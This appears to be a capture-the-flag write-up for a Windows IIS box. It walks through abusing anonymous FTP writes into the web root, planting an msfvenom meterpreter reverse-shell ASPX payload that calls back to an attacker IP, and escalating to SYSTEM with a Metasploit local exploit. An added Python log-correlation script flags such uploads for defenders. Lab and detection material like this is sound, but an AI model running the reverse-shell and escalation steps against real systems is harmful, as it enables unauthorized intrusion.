The nmap scan shows two services: FTP and HTTP.

This is the web page.

Looking at FTP, anonymous login is allowed, and the FTP root is the web page directory. We can upload .asp or .aspx files and access them over HTTP.

First, I create a demo.asp and upload it via FTP. We can access it over HTTP.

Then, I use msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.3" LPORT=9001 -f aspx > reverse.aspx to create a reverse shell payload, and upload it.

Open msf and use the exploit/multi/handler module to handle the reverse shell. We are now IIS APPPOOL\Web.

Furthermore, run post/multi/recon/local_exploit_suggester and use one of the suggested exploits, such as the module windows/local/ms13_053_schlamperei. Now we are NT AUTHORITY\SYSTEM, and we can get user.txt and root.txt.
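
The foothold above depends on anonymous FTP writes landing in the directory that HTTP serves. As an added example (not part of the original writeup), this Python sketch correlates FTP and HTTP logs to flag script files uploaded by an anonymous session and then requested over HTTP. The log lines, the field lists, the `anonymous`/`ftp` user names and the one-hour window are constructed assumptions, and it assumes the FTP root and the web root are the same directory, as on this host.

```python
from datetime import datetime

SCRIPT_EXT = (".asp", ".aspx")      # types the page shows being uploaded and served
ANON_USERS = {"anonymous", "ftp"}   # assumption: how anonymous sessions are logged

# Constructed sample logs in W3C extended format (not taken from the target).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-10 09:14:02 192.0.2.50 anonymous STOR /demo.asp 226
2024-01-10 09:15:40 192.0.2.50 anonymous STOR /notes.txt 226
2024-01-10 09:20:11 192.0.2.50 anonymous STOR /reverse.aspx 226
2024-01-10 09:21:00 192.0.2.77 siteadmin STOR /default.aspx 226
2024-01-10 09:22:00 192.0.2.50 anonymous STOR /blocked.aspx 550
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-10 09:14:30 192.0.2.50 GET /demo.asp 200
2024-01-10 09:20:45 192.0.2.50 GET /reverse.aspx 200
2024-01-10 09:30:00 192.0.2.9 GET /default.aspx 200
"""

def parse_w3c(text):
    """Parse W3C log text into dicts keyed by the names on the #Fields line."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            rows.append(row)
    return rows

def anonymous_script_uploads(ftp_rows):
    """Completed (226) STOR commands from anonymous sessions that wrote a script file."""
    return [r for r in ftp_rows
            if r["cs-method"].upper() == "STOR" and r["sc-status"] == "226"
            and r["cs-username"].lower() in ANON_USERS
            and r["cs-uri-stem"].lower().endswith(SCRIPT_EXT)]

def correlate(ftp_rows, http_rows, window_s=3600):
    """Pair each upload with HTTP requests for the same path inside the time window."""
    findings = []
    for up in anonymous_script_uploads(ftp_rows):
        hits = [h for h in http_rows
                if h["cs-uri-stem"].lower() == up["cs-uri-stem"].lower()
                and 0 <= (h["ts"] - up["ts"]).total_seconds() <= window_s]
        findings.append({"path": up["cs-uri-stem"], "uploader": up["c-ip"],
                         "requested": bool(hits),
                         "requesters": sorted({h["c-ip"] for h in hits})})
    return findings

if __name__ == "__main__":
    for f in correlate(parse_w3c(FTP_LOG), parse_w3c(HTTP_LOG)):
        print(f)
```

A finding with `requested` set to true means an anonymously uploaded script was fetched through the web server, which is the point at which disabling anonymous write access or separating the FTP root from the web root would have stopped the chain.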
